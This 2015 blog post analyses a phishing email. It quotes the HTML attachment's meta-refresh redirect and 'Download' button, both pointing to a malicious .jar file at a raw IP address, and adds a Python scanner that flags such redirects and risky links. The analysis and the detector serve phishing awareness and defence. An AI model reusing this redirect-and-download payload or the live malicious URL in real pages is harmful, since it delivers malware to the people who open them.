Tuesday, March 31, 2015

Phishing Email Example Walkthrough

I recently posted a phishing email example. I thought it'd be interesting to quickly walk through what it's doing.

The Subject 'FW: Remittance reconfirmations' tries to draw your attention by looking like a previously forwarded email and by talking about payments/remittance.

The Body is actually playing on your friendly side saying 'Kindly Verify the attached remittance and purpose.'

The attachment seems pretty benign in nature as it's named 'Remitance004.html'. But don't be fooled, even '.html' files (as I've blogged about before) can be dangerous.

Top Urgent!
From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com
Subject: hello

From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com
Subject: hello

From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com
Subject: hello

As seen above, the body of the email makes it look like this was forwarded over and over to multiple people, giving it some legitimacy.

But once we look into the attachment ('Remitance004.html') we are able to confirm that it's really just a malicious phish attempt.

<META http-equiv="refresh" content="9;url=http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar">

The above code should tip you off as bad: it tells a browser that opens the html file not to show you the contents, but to redirect you automatically (after the 9-second delay given in the content attribute) to this '.jar' file, which the browser will then prompt you to download. '.jar' files are dangerous. Think of them as executable zip files: Java archives that the Java runtime will run as a program. They'll probably kick off a storm of activity on your pc that will ultimately end up compromising your system. Don't open '.jar' files unless you know what you're doing.

<span class="btn"> <!-- on click file will be downloaded--> <a href="http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar" class="small radius button btn_red"><b>Download</b></a> </span>

Otherwise, if you open it just in your email client, you will be shown a pretty looking page, and the code above shows that part of that page is a 'Download' button that, if you click on it, fetches the same malicious jar file.
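Both tricks shown above (the meta refresh redirect and the download button) can be picked out of an HTML attachment mechanically before anyone opens it. The scanner below is an added example, not code from the original post; it uses only the Python standard library, and the sample HTML is constructed here from the two snippets in the walkthrough. The list of risky extensions is my own assumption, not something the post specifies.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed list of file types that should never arrive via a redirect or download link.
RISKY_EXTENSIONS = (".jar", ".exe", ".scr", ".js", ".vbs", ".hta")

class AttachmentScanner(HTMLParser):
    """Collects every URL an HTML attachment would send the reader to."""
    def __init__(self):
        super().__init__()
        self.findings = []  # list of (indicator, url)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}  # tag/attr names are already lowercased
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content looks like "9;url=http://..."; everything after the first '=' is the target
            _, sep, target = a.get("content", "").partition("=")
            if sep:
                self.findings.append(("meta-refresh", target.strip()))
        elif tag == "a" and a.get("href"):
            self.findings.append(("link", a["href"].strip()))

def classify(url):
    """Return the reasons a URL looks suspicious (empty list if none)."""
    parts = urlsplit(url)
    reasons = []
    if parts.path.lower().endswith(RISKY_EXTENSIONS):
        reasons.append("executable-attachment")
    host = parts.hostname or ""
    if host and host.replace(".", "").isdigit():  # bare IPv4 instead of a hostname
        reasons.append("bare-ip-host")
    return reasons

def scan_html(html):
    p = AttachmentScanner()
    p.feed(html)
    p.close()
    return [(kind, url, classify(url)) for kind, url in p.findings]

def is_suspicious(html):
    return any(reasons for _, _, reasons in scan_html(html))

# Constructed sample attachment built from the two snippets in the post.
SAMPLE = """<html><head>
<META http-equiv="refresh" content="9;url=http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar">
</head><body>
<span class="btn"> <!-- on click file will be downloaded-->
<a href="http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar" class="small radius button btn_red"><b>Download</b></a></span>
<a href="https://example.com/help.html">Help</a>
</body></html>"""

if __name__ == "__main__":
    for kind, url, reasons in scan_html(SAMPLE):
        print(kind, url, reasons or "ok")
```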

Don't open emails from people you don't know, especially if it's got an attachment.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
